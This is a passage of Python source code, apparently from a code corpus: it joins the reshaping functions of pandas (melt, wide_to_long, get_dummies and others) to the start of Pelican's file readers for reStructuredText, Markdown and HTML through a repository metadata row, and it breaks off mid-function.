clev, clab = factorize(frame.columns)
new_levels.append(clev)
new_labels.append(np.tile(clab, N).ravel())
new_names = list(frame.index.names)
new_names.append(frame.columns.name)
new_index = MultiIndex(levels=new_levels, labels=new_labels,
names=new_names, verify_integrity=False)
else:
levels, (ilab, clab) = zip(*map(factorize, (frame.index,
frame.columns)))
labels = ilab.repeat(K), np.tile(clab, N).ravel()
new_index = MultiIndex(levels=levels, labels=labels,
names=[frame.index.name, frame.columns.name],
verify_integrity=False)
new_values = frame.values.ravel()
if dropna:
mask = notna(new_values)
new_values = new_values[mask]
new_index = new_index[mask]
return Series(new_values, index=new_index)
def stack_multiple(frame, level, dropna=True):
# If all passed levels match up to column names, no
# ambiguity about what to do
if all(lev in frame.columns.names for lev in level):
result = frame
for lev in level:
result = stack(result, lev, dropna=dropna)
# Otherwise, level numbers may change as each successive level is stacked
elif all(isinstance(lev, int) for lev in level):
# As each stack is done, the level numbers decrease, so we need
# to account for that when level is a sequence of ints
result = frame
# _get_level_number() checks level numbers are in range and converts
# negative numbers to positive
level = [frame.columns._get_level_number(lev) for lev in level]
# Can't iterate directly through level as we might need to change
# values as we go
for index in range(len(level)):
lev = level[index]
result = stack(result, lev, dropna=dropna)
# Decrement all level numbers greater than current, as these
# have now shifted down by one
updated_level = []
for other in level:
if other > lev:
updated_level.append(other - 1)
else:
updated_level.append(other)
level = updated_level
else:
raise ValueError("level should contain all level names or all level "
"numbers, not a mixture of the two.")
return result
def _stack_multi_columns(frame, level_num=-1, dropna=True):
def _convert_level_number(level_num, columns):
"""
Logic for converting the level number to something we can safely pass
to swaplevel:
We generally want to convert the level number into a level name, except
when columns do not have names, in which case we must leave as a level
number
"""
if level_num in columns.names:
return columns.names[level_num]
else:
if columns.names[level_num] is None:
return level_num
else:
return columns.names[level_num]
this = frame.copy()
# this makes life much simpler
if level_num != frame.columns.nlevels - 1:
# roll levels to put selected level at end
roll_columns = this.columns
for i in range(level_num, frame.columns.nlevels - 1):
# Need to check if the ints conflict with level names
lev1 = _convert_level_number(i, roll_columns)
lev2 = _convert_level_number(i + 1, roll_columns)
roll_columns = roll_columns.swaplevel(lev1, lev2)
this.columns = roll_columns
if not this.columns.is_lexsorted():
# Workaround the edge case where 0 is one of the column names,
# which interferes with trying to sort based on the first
# level
level_to_sort = _convert_level_number(0, this.columns)
this = this.sort_index(level=level_to_sort, axis=1)
# tuple list excluding level for grouping columns
if len(frame.columns.levels) > 2:
tuples = list(zip(*[lev.take(lab)
for lev, lab in zip(this.columns.levels[:-1],
this.columns.labels[:-1])]))
unique_groups = [key for key, _ in itertools.groupby(tuples)]
new_names = this.columns.names[:-1]
new_columns = MultiIndex.from_tuples(unique_groups, names=new_names)
else:
new_columns = unique_groups = this.columns.levels[0]
# time to ravel the values
new_data = {}
level_vals = this.columns.levels[-1]
level_labels = sorted(set(this.columns.labels[-1]))
level_vals_used = level_vals[level_labels]
levsize = len(level_labels)
drop_cols = []
for key in unique_groups:
loc = this.columns.get_loc(key)
# can make more efficient?
# we almost always return a slice
# but if unsorted can get a boolean
# indexer
if not isinstance(loc, slice):
slice_len = len(loc)
else:
slice_len = loc.stop - loc.start
if slice_len == 0:
drop_cols.append(key)
continue
elif slice_len != levsize:
chunk = this.loc[:, this.columns[loc]]
chunk.columns = level_vals.take(chunk.columns.labels[-1])
value_slice = chunk.reindex(columns=level_vals_used).values
else:
if frame._is_mixed_type:
value_slice = this.loc[:, this.columns[loc]].values
else:
value_slice = this.values[:, loc]
new_data[key] = value_slice.ravel()
if len(drop_cols) > 0:
new_columns = new_columns.difference(drop_cols)
N = len(this)
if isinstance(this.index, MultiIndex):
new_levels = list(this.index.levels)
new_names = list(this.index.names)
new_labels = [lab.repeat(levsize) for lab in this.index.labels]
else:
new_levels = [this.index]
new_labels = [np.arange(N).repeat(levsize)]
new_names = [this.index.name] # something better?
new_levels.append(level_vals)
new_labels.append(np.tile(level_labels, N))
new_names.append(frame.columns.names[level_num])
new_index = MultiIndex(levels=new_levels, labels=new_labels,
names=new_names, verify_integrity=False)
result = DataFrame(new_data, index=new_index, columns=new_columns)
# more efficient way to go about this? can do the whole masking biz but
# will only save a small amount of time...
if dropna:
result = result.dropna(axis=0, how='all')
return result
@Appender(_shared_docs['melt'] %
dict(caller='pd.melt(df, ',
versionadded="",
other='DataFrame.melt'))
def melt(frame, id_vars=None, value_vars=None, var_name=None,
value_name='value', col_level=None):
# TODO: what about the existing index?
if id_vars is not None:
if not is_list_like(id_vars):
id_vars = [id_vars]
elif (isinstance(frame.columns, MultiIndex) and
not isinstance(id_vars, list)):
raise ValueError('id_vars must be a list of tuples when columns'
' are a MultiIndex')
else:
id_vars = list(id_vars)
else:
id_vars = []
if value_vars is not None:
if not is_list_like(value_vars):
value_vars = [value_vars]
elif (isinstance(frame.columns, MultiIndex) and
not isinstance(value_vars, list)):
raise ValueError('value_vars must be a list of tuples when'
' columns are a MultiIndex')
else:
value_vars = list(value_vars)
frame = frame.loc[:, id_vars + value_vars]
else:
frame = frame.copy()
if col_level is not None: # allow list or other?
# frame is a copy
frame.columns = frame.columns.get_level_values(col_level)
if var_name is None:
if isinstance(frame.columns, MultiIndex):
if len(frame.columns.names) == len(set(frame.columns.names)):
var_name = frame.columns.names
else:
var_name = ['variable_%s' % i
for i in range(len(frame.columns.names))]
else:
var_name = [frame.columns.name if frame.columns.name is not None
else 'variable']
if isinstance(var_name, compat.string_types):
var_name = [var_name]
N, K = frame.shape
K -= len(id_vars)
mdata = {}
for col in id_vars:
mdata[col] = np.tile(frame.pop(col).values, K)
mcolumns = id_vars + var_name + [value_name]
mdata[value_name] = frame.values.ravel('F')
for i, col in enumerate(var_name):
# asanyarray will keep the columns as an Index
mdata[col] = np.asanyarray(frame.columns
._get_level_values(i)).repeat(N)
return DataFrame(mdata, columns=mcolumns)
def lreshape(data, groups, dropna=True, label=None):
"""
Reshape long-format data to wide. Generalized inverse of DataFrame.pivot
Parameters
----------
data : DataFrame
groups : dict
{new_name : list_of_columns}
dropna : boolean, default True
Examples
--------
>>> import pandas as pd
>>> data = pd.DataFrame({'hr1': [514, 573], 'hr2': [545, 526],
... 'team': ['Red Sox', 'Yankees'],
... 'year1': [2007, 2007], 'year2': [2008, 2008]})
>>> data
hr1 hr2 team year1 year2
0 514 545 Red Sox 2007 2008
1 573 526 Yankees 2007 2008
>>> pd.lreshape(data, {'year': ['year1', 'year2'], 'hr': ['hr1', 'hr2']})
team year hr
0 Red Sox 2007 514
1 Yankees 2007 573
2 Red Sox 2008 545
3 Yankees 2008 526
Returns
-------
reshaped : DataFrame
"""
if isinstance(groups, dict):
keys = list(groups.keys())
values = list(groups.values())
else:
keys, values = zip(*groups)
all_cols = list(set.union(*[set(x) for x in values]))
id_cols = list(data.columns.difference(all_cols))
K = len(values[0])
for seq in values:
if len(seq) != K:
raise ValueError('All column lists must be same length')
mdata = {}
pivot_cols = []
for target, names in zip(keys, values):
to_concat = [data[col].values for col in names]
mdata[target] = _concat._concat_compat(to_concat)
pivot_cols.append(target)
for col in id_cols:
mdata[col] = np.tile(data[col].values, K)
if dropna:
mask = np.ones(len(mdata[pivot_cols[0]]), dtype=bool)
for c in pivot_cols:
mask &= notna(mdata[c])
if not mask.all():
mdata = dict((k, v[mask]) for k, v in compat.iteritems(mdata))
return DataFrame(mdata, columns=id_cols + pivot_cols)
def wide_to_long(df, stubnames, i, j, sep="", suffix='\d+'):
r"""
Wide panel to long format. Less flexible but more user-friendly than melt.
With stubnames ['A', 'B'], this function expects to find one or more
group of columns with format Asuffix1, Asuffix2,..., Bsuffix1, Bsuffix2,...
You specify what you want to call this suffix in the resulting long format
with `j` (for example `j='year'`)
Each row of these wide variables are assumed to be uniquely identified by
`i` (can be a single column name or a list of column names)
All remaining variables in the data frame are left intact.
Parameters
----------
df : DataFrame
The wide-format DataFrame
stubnames : str or list-like
The stub name(s). The wide format variables are assumed to
start with the stub names.
i : str or list-like
Column(s) to use as id variable(s)
j : str
The name of the subobservation variable. What you wish to name your
suffix in the long format.
sep : str, default ""
A character indicating the separation of the variable names
in the wide format, to be stripped from the names in the long format.
For example, if your column names are A-suffix1, A-suffix2, you
can strip the hypen by specifying `sep='-'`
.. versionadded:: 0.20.0
suffix : str, default '\\d+'
A regular expression capturing the wanted suffixes. '\\d+' captures
numeric suffixes. Suffixes with no numbers could be specified with the
negated character class '\\D+'. You can also further disambiguate
suffixes, for example, if your wide variables are of the form
Aone, Btwo,.., and you have an unrelated column Arating, you can
ignore the last one by specifying `suffix='(!?one|two)'`
.. versionadded:: 0.20.0
Returns
-------
DataFrame
A DataFrame that contains each stub name as a variable, with new index
(i, j)
Examples
--------
>>> import pandas as pd
>>> import numpy as np
>>> np.random.seed(123)
>>> df = pd.DataFrame({"A1970" : {0 : "a", 1 : "b", 2 : "c"},
... "A1980" : {0 : "d", 1 : "e", 2 : "f"},
... "B1970" : {0 : 2.5, 1 : 1.2, 2 : .7},
... "B1980" : {0 : 3.2, 1 : 1.3, 2 : .1},
... "X" : dict(zip(range(3), np.random.randn(3)))
... })
>>> df["id"] = df.index
>>> df
A1970 A1980 B1970 B1980 X id
0 a d 2.5 3.2 -1.085631 0
1 b e 1.2 1.3 0.997345 1
2 c f 0.7 0.1 0.282978 2
>>> pd.wide_to_long(df, ["A", "B"], i="id", j="year")
... # doctest: +NORMALIZE_WHITESPACE
X A B
id year
0 1970 -1.085631 a 2.5
1 1970 0.997345 b 1.2
2 1970 0.282978 c 0.7
0 1980 -1.085631 d 3.2
1 1980 0.997345 e 1.3
2 1980 0.282978 f 0.1
With multuple id columns
>>> df = pd.DataFrame({
... 'famid': [1, 1, 1, 2, 2, 2, 3, 3, 3],
... 'birth': [1, 2, 3, 1, 2, 3, 1, 2, 3],
... 'ht1': [2.8, 2.9, 2.2, 2, 1.8, 1.9, 2.2, 2.3, 2.1],
... 'ht2': [3.4, 3.8, 2.9, 3.2, 2.8, 2.4, 3.3, 3.4, 2.9]
... })
>>> df
birth famid ht1 ht2
0 1 1 2.8 3.4
1 2 1 2.9 3.8
2 3 1 2.2 2.9
3 1 2 2.0 3.2
4 2 2 1.8 2.8
5 3 2 1.9 2.4
6 1 3 2.2 3.3
7 2 3 2.3 3.4
8 3 3 2.1 2.9
>>> l = pd.wide_to_long(df, stubnames='ht', i=['famid', 'birth'], j='age')
>>> l
... # doctest: +NORMALIZE_WHITESPACE
ht
famid birth age
1 1 1 2.8
2 3.4
2 1 2.9
2 3.8
3 1 2.2
2 2.9
2 1 1 2.0
2 3.2
2 1 1.8
2 2.8
3 1 1.9
2 2.4
3 1 1 2.2
2 3.3
2 1 2.3
2 3.4
3 1 2.1
2 2.9
Going from long back to wide just takes some creative use of `unstack`
>>> w = l.reset_index().set_index(['famid', 'birth', 'age']).unstack()
>>> w.columns = pd.Index(w.columns).str.join('')
>>> w.reset_index()
famid birth ht1 ht2
0 1 1 2.8 3.4
1 1 2 2.9 3.8
2 1 3 2.2 2.9
3 2 1 2.0 3.2
4 2 2 1.8 2.8
5 2 3 1.9 2.4
6 3 1 2.2 3.3
7 3 2 2.3 3.4
8 3 3 2.1 2.9
Less wieldy column names are also handled
>>> np.random.seed(0)
>>> df = pd.DataFrame({'A(quarterly)-2010': np.random.rand(3),
... 'A(quarterly)-2011': np.random.rand(3),
... 'B(quarterly)-2010': np.random.rand(3),
... 'B(quarterly)-2011': np.random.rand(3),
... 'X' : np.random.randint(3, size=3)})
>>> df['id'] = df.index
>>> df # doctest: +NORMALIZE_WHITESPACE, +ELLIPSIS
A(quarterly)-2010 A(quarterly)-2011 B(quarterly)-2010 ...
0 0.548814 0.544883 0.437587 ...
1 0.715189 0.423655 0.891773 ...
2 0.602763 0.645894 0.963663 ...
X id
0 0 0
1 1 1
2 1 2
>>> pd.wide_to_long(df, ['A(quarterly)', 'B(quarterly)'], i='id',
... j='year', sep='-')
... # doctest: +NORMALIZE_WHITESPACE
X A(quarterly) B(quarterly)
id year
0 2010 0 0.548814 0.437587
1 2010 1 0.715189 0.891773
2 2010 1 0.602763 0.963663
0 2011 0 0.544883 0.383442
1 2011 1 0.423655 0.791725
2 2011 1 0.645894 0.528895
If we have many columns, we could also use a regex to find our
stubnames and pass that list on to wide_to_long
>>> stubnames = sorted(
... set([match[0] for match in df.columns.str.findall(
... r'[A-B]\(.*\)').values if match != [] ])
... )
>>> list(stubnames)
['A(quarterly)', 'B(quarterly)']
Notes
-----
All extra variables are left untouched. This simply uses
`pandas.melt` under the hood, but is hard-coded to "do the right thing"
in a typicaly case.
"""
def get_var_names(df, stub, sep, suffix):
regex = "^{0}{1}{2}".format(re.escape(stub), re.escape(sep), suffix)
return df.filter(regex=regex).columns.tolist()
def melt_stub(df, stub, i, j, value_vars, sep):
newdf = melt(df, id_vars=i, value_vars=value_vars,
value_name=stub.rstrip(sep), var_name=j)
newdf[j] = Categorical(newdf[j])
newdf[j] = newdf[j].str.replace(re.escape(stub + sep), "")
return newdf.set_index(i + [j])
if any(map(lambda s: s in df.columns.tolist(), stubnames)):
raise ValueError("stubname can't be identical to a column name")
if not is_list_like(stubnames):
stubnames = [stubnames]
else:
stubnames = list(stubnames)
if not is_list_like(i):
i = [i]
else:
i = list(i)
if df[i].duplicated().any():
raise ValueError("the id variables need to uniquely identify each row")
value_vars = list(map(lambda stub:
get_var_names(df, stub, sep, suffix), stubnames))
value_vars_flattened = [e for sublist in value_vars for e in sublist]
id_vars = list(set(df.columns.tolist()).difference(value_vars_flattened))
melted = []
for s, v in zip(stubnames, value_vars):
melted.append(melt_stub(df, s, i, j, v, sep))
melted = melted[0].join(melted[1:], how='outer')
if len(i) == 1:
new = df[id_vars].set_index(i).join(melted)
return new
new = df[id_vars].merge(melted.reset_index(), on=i).set_index(i + [j])
return new
def get_dummies(data, prefix=None, prefix_sep='_', dummy_na=False,
columns=None, sparse=False, drop_first=False):
"""
Convert categorical variable into dummy/indicator variables
Parameters
----------
data : array-like, Series, or DataFrame
prefix : string, list of strings, or dict of strings, default None
String to append DataFrame column names
Pass a list with length equal to the number of columns
when calling get_dummies on a DataFrame. Alternativly, `prefix`
can be a dictionary mapping column names to prefixes.
prefix_sep : string, default '_'
If appending prefix, separator/delimiter to use. Or pass a
list or dictionary as with `prefix.`
dummy_na : bool, default False
Add a column to indicate NaNs, if False NaNs are ignored.
columns : list-like, default None
Column names in the DataFrame to be encoded.
If `columns` is None then all the columns with
`object` or `category` dtype will be converted.
sparse : bool, default False
Whether the dummy columns should be sparse or not. Returns
SparseDataFrame if `data` is a Series or if all columns are included.
Otherwise returns a DataFrame with some SparseBlocks.
.. versionadded:: 0.16.1
drop_first : bool, default False
Whether to get k-1 dummies out of k categorical levels by removing the
first level.
.. versionadded:: 0.18.0
Returns
-------
dummies : DataFrame or SparseDataFrame
Examples
--------
>>> import pandas as pd
>>> s = pd.Series(list('abca'))
>>> pd.get_dummies(s)
a b c
0 1 0 0
1 0 1 0
2 0 0 1
3 1 0 0
>>> s1 = ['a', 'b', np.nan]
>>> pd.get_dummies(s1)
a b
0 1 0
1 0 1
2 0 0
>>> pd.get_dummies(s1, dummy_na=True)
a b NaN
0 1 0 0
1 0 1 0
2 0 0 1
>>> df = pd.DataFrame({'A': ['a', 'b', 'a'], 'B': ['b', 'a', 'c'],
... 'C': [1, 2, 3]})
>>> pd.get_dummies(df, prefix=['col1', 'col2'])
C col1_a col1_b col2_a col2_b col2_c
0 1 1 0 0 1 0
1 2 0 1 1 0 0
2 3 1 0 0 0 1
>>> pd.get_dummies(pd.Series(list('abcaa')))
a b c
0 1 0 0
1 0 1 0
2 0 0 1
3 1 0 0
4 1 0 0
>>> pd.get_dummies(pd.Series(list('abcaa')), drop_first=True)
b c
0 0 0
1 1 0
2 0 1
3 0 0
4 0 0
See Also
--------
Series.str.get_dummies
"""
from pandas.core.reshape.concat import concat
from itertools import cycle
if isinstance(data, DataFrame):
# determine columns being encoded
if columns is None:
columns_to_encode = data.select_dtypes(
include=['object', 'category']).columns
else:
columns_to_encode = columns
# validate prefixes and separator to avoid silently dropping cols
def check_len(item, name):
length_msg = ("Length of '{0}' ({1}) did not match the length of "
"the columns being encoded ({2}).")
if is_list_like(item):
if not len(item) == len(columns_to_encode):
raise ValueError(length_msg.format(name, len(item),
len(columns_to_encode)))
check_len(prefix, 'prefix')
check_len(prefix_sep, 'prefix_sep')
if isinstance(prefix, compat.string_types):
prefix = cycle([prefix])
if isinstance(prefix, dict):
prefix = [prefix[col] for col in columns_to_encode]
if prefix is None:
prefix = columns_to_encode
# validate separators
if isinstance(prefix_sep, compat.string_types):
prefix_sep = cycle([prefix_sep])
elif isinstance(prefix_sep, dict):
prefix_sep = [prefix_sep[col] for col in columns_to_encode]
if set(columns_to_encode) == set(data.columns):
with_dummies = []
else:
with_dummies = [data.drop(columns_to_encode, axis=1)]
for (col, pre, sep) in zip(columns_to_encode, prefix, prefix_sep):
dummy = _get_dummies_1d(data[col], prefix=pre, prefix_sep=sep,
dummy_na=dummy_na, sparse=sparse,
drop_first=drop_first)
with_dummies.append(dummy)
result = concat(with_dummies, axis=1)
else:
result = _get_dummies_1d(data, prefix, prefix_sep, dummy_na,
sparse=sparse, drop_first=drop_first)
return result
def _get_dummies_1d(data, prefix, prefix_sep='_', dummy_na=False,
sparse=False, drop_first=False):
# Series avoids inconsistent NaN handling
codes, levels = _factorize_from_iterable(Series(data))
def get_empty_Frame(data, sparse):
if isinstance(data, Series):
index = data.index
else:
index = np.arange(len(data))
if not sparse:
return DataFrame(index=index)
else:
return SparseDataFrame(index=index, default_fill_value=0)
# if all NaN
if not dummy_na and len(levels) == 0:
return get_empty_Frame(data, sparse)
codes = codes.copy()
if dummy_na:
codes[codes == -1] = len(levels)
levels = np.append(levels, np.nan)
# if dummy_na, we just fake a nan level. drop_first will drop it again
if drop_first and len(levels) == 1:
return get_empty_Frame(data, sparse)
number_of_cols = len(levels)
if prefix is not None:
dummy_cols = ['%s%s%s' % (prefix, prefix_sep, v) for v in levels]
else:
dummy_cols = levels
if isinstance(data, Series):
index = data.index
else:
index = None
if sparse:
sparse_series = {}
N = len(data)
sp_indices = [[] for _ in range(len(dummy_cols))]
for ndx, code in enumerate(codes):
if code == -1:
# Blank entries if not dummy_na and code == -1, #GH4446
continue
sp_indices[code].append(ndx)
if drop_first:
# remove first categorical level to avoid perfect collinearity
# GH12042
sp_indices = sp_indices[1:]
dummy_cols = dummy_cols[1:]
for col, ixs in zip(dummy_cols, sp_indices):
sarr = SparseArray(np.ones(len(ixs), dtype=np.uint8),
sparse_index=IntIndex(N, ixs), fill_value=0,
dtype=np.uint8)
sparse_series[col] = SparseSeries(data=sarr, index=index)
out = SparseDataFrame(sparse_series, index=index, columns=dummy_cols,
default_fill_value=0,
dtype=np.uint8)
return out
else:
dummy_mat = np.eye(number_of_cols, dtype=np.uint8).take(codes, axis=0)
if not dummy_na:
# reset NaN GH4446
dummy_mat[codes == -1] = 0
if drop_first:
# remove first GH12042
dummy_mat = dummy_mat[:, 1:]
dummy_cols = dummy_cols[1:]
return DataFrame(dummy_mat, index=index, columns=dummy_cols)
def make_axis_dummies(frame, axis='minor', transform=None):
"""
Construct 1-0 dummy variables corresponding to designated axis
labels
Parameters
----------
frame : DataFrame
axis : {'major', 'minor'}, default 'minor'
transform : function, default None
Function to apply to axis labels first. For example, to
get "day of week" dummies in a time series regression
you might call::
make_axis_dummies(panel, axis='major',
transform=lambda d: d.weekday())
Returns
-------
dummies : DataFrame
Column names taken from chosen axis
"""
numbers = {'major': 0, 'minor': 1}
num = numbers.get(axis, axis)
items = frame.index.levels[num]
labels = frame.index.labels[num]
if transform is not None:
mapped_items = items.map(transform)
labels, items = _factorize_from_iterable(mapped_items.take(labels))
values = np.eye(len(items), dtype=float)
values = values.take(labels, axis=0)
return DataFrame(values, columns=items, index=frame.index)
| gpl-2.0 | 8,329,274,033,396,292,000 | 33.239163 | 79 | 0.56005 | false |
zackw/pelican | pelican/readers.py | 1 | 25554 | # -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
import logging
import os
import re
from collections import OrderedDict
import docutils
import docutils.core
import docutils.io
from docutils.writers.html4css1 import HTMLTranslator, Writer
import six
from six.moves.html_parser import HTMLParser
from pelican import rstdirectives # NOQA
from pelican import signals
from pelican.cache import FileStampDataCacher
from pelican.contents import Author, Category, Page, Tag
from pelican.utils import SafeDatetime, escape_html, get_date, pelican_open, \
posixize_path
try:
from markdown import Markdown
except ImportError:
Markdown = False # NOQA
# Metadata processors have no way to discard an unwanted value, so we have
# them return this value instead to signal that it should be discarded later.
# This means that _filter_discardable_metadata() must be called on processed
# metadata dicts before use, to remove the items with the special value.
_DISCARD = object()
METADATA_PROCESSORS = {
'tags': lambda x, y: ([
Tag(tag, y)
for tag in ensure_metadata_list(x)
] or _DISCARD),
'date': lambda x, y: get_date(x.replace('_', ' ')),
'modified': lambda x, y: get_date(x),
'status': lambda x, y: x.strip() or _DISCARD,
'category': lambda x, y: _process_if_nonempty(Category, x, y),
'author': lambda x, y: _process_if_nonempty(Author, x, y),
'authors': lambda x, y: ([
Author(author, y)
for author in ensure_metadata_list(x)
] or _DISCARD),
'slug': lambda x, y: x.strip() or _DISCARD,
}
logger = logging.getLogger(__name__)
def ensure_metadata_list(text):
"""Canonicalize the format of a list of authors or tags. This works
the same way as Docutils' "authors" field: if it's already a list,
those boundaries are preserved; otherwise, it must be a string;
if the string contains semicolons, it is split on semicolons;
otherwise, it is split on commas. This allows you to write
author lists in either "Jane Doe, John Doe" or "Doe, Jane; Doe, John"
format.
Regardless, all list items undergo .strip() before returning, and
empty items are discarded.
"""
if isinstance(text, six.text_type):
if ';' in text:
text = text.split(';')
else:
text = text.split(',')
return list(OrderedDict.fromkeys(
[v for v in (w.strip() for w in text) if v]
))
def _process_if_nonempty(processor, name, settings):
"""Removes extra whitespace from name and applies a metadata processor.
If name is empty or all whitespace, returns _DISCARD instead.
"""
name = name.strip()
return processor(name, settings) if name else _DISCARD
def _filter_discardable_metadata(metadata):
"""Return a copy of a dict, minus any items marked as discardable."""
return {name: val for name, val in metadata.items() if val is not _DISCARD}
class BaseReader(object):
"""Base class to read files.
This class is used to process static files, and it can be inherited for
other types of file. A Reader class must have the following attributes:
- enabled: (boolean) tell if the Reader class is enabled. It
generally depends on the import of some dependency.
- file_extensions: a list of file extensions that the Reader will process.
- extensions: a list of extensions to use in the reader (typical use is
Markdown).
"""
enabled = True
file_extensions = ['static']
extensions = None
def __init__(self, settings):
self.settings = settings
def process_metadata(self, name, value):
if name in METADATA_PROCESSORS:
return METADATA_PROCESSORS[name](value, self.settings)
return value
def read(self, source_path):
"No-op parser"
content = None
metadata = {}
return content, metadata
class _FieldBodyTranslator(HTMLTranslator):
def __init__(self, document):
HTMLTranslator.__init__(self, document)
self.compact_p = None
def astext(self):
return ''.join(self.body)
def visit_field_body(self, node):
pass
def depart_field_body(self, node):
pass
def render_node_to_html(document, node, field_body_translator_class):
visitor = field_body_translator_class(document)
node.walkabout(visitor)
return visitor.astext()
class PelicanHTMLWriter(Writer):
def __init__(self):
Writer.__init__(self)
self.translator_class = PelicanHTMLTranslator
class PelicanHTMLTranslator(HTMLTranslator):
def visit_abbreviation(self, node):
attrs = {}
if node.hasattr('explanation'):
attrs['title'] = node['explanation']
self.body.append(self.starttag(node, 'abbr', '', **attrs))
def depart_abbreviation(self, node):
self.body.append('</abbr>')
def visit_image(self, node):
# set an empty alt if alt is not specified
# avoids that alt is taken from src
node['alt'] = node.get('alt', '')
return HTMLTranslator.visit_image(self, node)
class RstReader(BaseReader):
"""Reader for reStructuredText files
By default the output HTML is written using
docutils.writers.html4css1.Writer and translated using a subclass of
docutils.writers.html4css1.HTMLTranslator. If you want to override it with
your own writer/translator (e.g. a HTML5-based one), pass your classes to
these two attributes. Look in the source code for details.
writer_class Used for writing contents
field_body_translator_class Used for translating metadata such
as article summary
"""
enabled = bool(docutils)
file_extensions = ['rst']
writer_class = PelicanHTMLWriter
field_body_translator_class = _FieldBodyTranslator
class FileInput(docutils.io.FileInput):
"""Patch docutils.io.FileInput to remove "U" mode in py3.
Universal newlines is enabled by default and "U" mode is deprecated
in py3.
"""
def __init__(self, *args, **kwargs):
if six.PY3:
kwargs['mode'] = kwargs.get('mode', 'r').replace('U', '')
docutils.io.FileInput.__init__(self, *args, **kwargs)
def __init__(self, *args, **kwargs):
super(RstReader, self).__init__(*args, **kwargs)
def _parse_metadata(self, document):
"""Return the dict containing document metadata"""
formatted_fields = self.settings['FORMATTED_FIELDS']
output = {}
for docinfo in document.traverse(docutils.nodes.docinfo):
for element in docinfo.children:
if element.tagname == 'field': # custom fields (e.g. summary)
name_elem, body_elem = element.children
name = name_elem.astext()
if name in formatted_fields:
value = render_node_to_html(
document, body_elem,
self.field_body_translator_class)
else:
value = body_elem.astext()
elif element.tagname == 'authors': # author list
name = element.tagname
value = [element.astext() for element in element.children]
else: # standard fields (e.g. address)
name = element.tagname
value = element.astext()
name = name.lower()
output[name] = self.process_metadata(name, value)
return output
def _get_publisher(self, source_path):
extra_params = {'initial_header_level': '2',
'syntax_highlight': 'short',
'input_encoding': 'utf-8',
'exit_status_level': 2,
'embed_stylesheet': False}
user_params = self.settings.get('DOCUTILS_SETTINGS')
if user_params:
extra_params.update(user_params)
pub = docutils.core.Publisher(
writer=self.writer_class(),
source_class=self.FileInput,
destination_class=docutils.io.StringOutput)
pub.set_components('standalone', 'restructuredtext', 'html')
pub.process_programmatic_settings(None, extra_params, None)
pub.set_source(source_path=source_path)
pub.publish(enable_exit_status=True)
return pub
def read(self, source_path):
"""Parses restructured text"""
pub = self._get_publisher(source_path)
parts = pub.writer.parts
content = parts.get('body')
metadata = self._parse_metadata(pub.document)
metadata.setdefault('title', parts.get('title'))
return content, metadata
class MarkdownReader(BaseReader):
"""Reader for Markdown files"""
enabled = bool(Markdown)
file_extensions = ['md', 'markdown', 'mkd', 'mdown']
def __init__(self, *args, **kwargs):
super(MarkdownReader, self).__init__(*args, **kwargs)
settings = self.settings['MARKDOWN']
settings.setdefault('extension_configs', {})
settings.setdefault('extensions', [])
for extension in settings['extension_configs'].keys():
if extension not in settings['extensions']:
settings['extensions'].append(extension)
if 'markdown.extensions.meta' not in settings['extensions']:
settings['extensions'].append('markdown.extensions.meta')
self._source_path = None
def _parse_metadata(self, meta):
"""Return the dict containing document metadata"""
formatted_fields = self.settings['FORMATTED_FIELDS']
output = {}
for name, value in meta.items():
name = name.lower()
if name in formatted_fields:
# formatted metadata is special case and join all list values
formatted_values = "\n".join(value)
# reset the markdown instance to clear any state
self._md.reset()
formatted = self._md.convert(formatted_values)
output[name] = self.process_metadata(name, formatted)
elif name in METADATA_PROCESSORS:
if len(value) > 1:
logger.warning(
'Duplicate definition of `%s` '
'for %s. Using first one.',
name, self._source_path)
output[name] = self.process_metadata(name, value[0])
elif len(value) > 1:
# handle list metadata as list of string
output[name] = self.process_metadata(name, value)
else:
# otherwise, handle metadata as single string
output[name] = self.process_metadata(name, value[0])
return output
def read(self, source_path):
"""Parse content and metadata of markdown files"""
self._source_path = source_path
self._md = Markdown(**self.settings['MARKDOWN'])
with pelican_open(source_path) as text:
content = self._md.convert(text)
if hasattr(self._md, 'Meta'):
metadata = self._parse_metadata(self._md.Meta)
else:
metadata = {}
return content, metadata
class HTMLReader(BaseReader):
"""Parses HTML files as input, looking for meta, title, and body tags"""
file_extensions = ['htm', 'html']
enabled = True
class _HTMLParser(HTMLParser):
def __init__(self, settings, filename):
try:
# Python 3.4+
HTMLParser.__init__(self, convert_charrefs=False)
except TypeError:
HTMLParser.__init__(self)
self.body = ''
self.metadata = {}
self.settings = settings
self._data_buffer = ''
self._filename = filename
self._in_top_level = True
self._in_head = False
self._in_title = False
self._in_body = False
self._in_tags = False
def handle_starttag(self, tag, attrs):
if tag == 'head' and self._in_top_level:
self._in_top_level = False
self._in_head = True
elif tag == 'title' and self._in_head:
self._in_title = True
self._data_buffer = ''
elif tag == 'body' and self._in_top_level:
self._in_top_level = False
self._in_body = True
self._data_buffer = ''
elif tag == 'meta' and self._in_head:
self._handle_meta_tag(attrs)
elif self._in_body:
self._data_buffer += self.build_tag(tag, attrs, False)
def handle_endtag(self, tag):
if tag == 'head':
if self._in_head:
self._in_head = False
self._in_top_level = True
elif tag == 'title':
self._in_title = False
self.metadata['title'] = self._data_buffer
elif tag == 'body':
self.body = self._data_buffer
self._in_body = False
self._in_top_level = True
elif self._in_body:
self._data_buffer += '</{}>'.format(escape_html(tag))
def handle_startendtag(self, tag, attrs):
if tag == 'meta' and self._in_head:
self._handle_meta_tag(attrs)
if self._in_body:
self._data_buffer += self.build_tag(tag, attrs, True)
def handle_comment(self, data):
self._data_buffer += '<!--{}-->'.format(data)
def handle_data(self, data):
self._data_buffer += data
def handle_entityref(self, data):
self._data_buffer += '&{};'.format(data)
def handle_charref(self, data):
self._data_buffer += '&#{};'.format(data)
def build_tag(self, tag, attrs, close_tag):
result = '<{}'.format(escape_html(tag))
for k, v in attrs:
result += ' ' + escape_html(k)
if v is not None:
# If the attribute value contains a double quote, surround
# with single quotes, otherwise use double quotes.
if '"' in v:
result += "='{}'".format(escape_html(v, quote=False))
else:
result += '="{}"'.format(escape_html(v, quote=False))
if close_tag:
return result + ' />'
return result + '>'
def _handle_meta_tag(self, attrs):
name = self._attr_value(attrs, 'name')
if name is None:
attr_list = ['{}="{}"'.format(k, v) for k, v in attrs]
attr_serialized = ', '.join(attr_list)
logger.warning("Meta tag in file %s does not have a 'name' "
"attribute, skipping. Attributes: %s",
self._filename, attr_serialized)
return
name = name.lower()
contents = self._attr_value(attrs, 'content', '')
if not contents:
contents = self._attr_value(attrs, 'contents', '')
if contents:
logger.warning(
